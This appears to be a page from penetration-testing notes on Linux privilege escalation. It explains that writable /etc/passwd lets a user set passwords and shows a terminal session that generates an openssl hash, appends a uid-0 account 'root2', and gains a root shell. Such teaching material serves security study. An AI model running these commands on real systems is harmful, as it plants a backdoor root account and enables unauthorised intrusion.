Abusing Password Authentication

How Linux Passwords Work

Unless a centralized credential system such as Active Directory or LDAP is used, Linux passwords are generally stored in /etc/shadow, which is not readable by normal users.

Exploiting Legacy /etc/passwd

Historically, password hashes, along with other account information, were stored in the word-readable file /etc/passwd. For backwards compatibility, if a password hash is present in the second column of an /etc/passwd user record, it is considered valid for authentication. This means that if we can write into /etc/passwd, we can effectively set an arbitrary password for any account

Adding an elevated account with write privileges to /etc/passwd

Generate a hash using the openssl tool

joe@debian-privesc:~$ openssl passwd w00t
Fdzt.eqJQ4s0g

joe@debian-privesc:~$ echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd

joe@debian-privesc:~$ su root2
Password: w00t

root@debian-privesc:/home/joe# id
uid=0(root) gid=0(root) groups=0(root)

PreviousAbusing Cron Jobs NextAbusing SUID Binaries and Capabilities

Last updated 1 year ago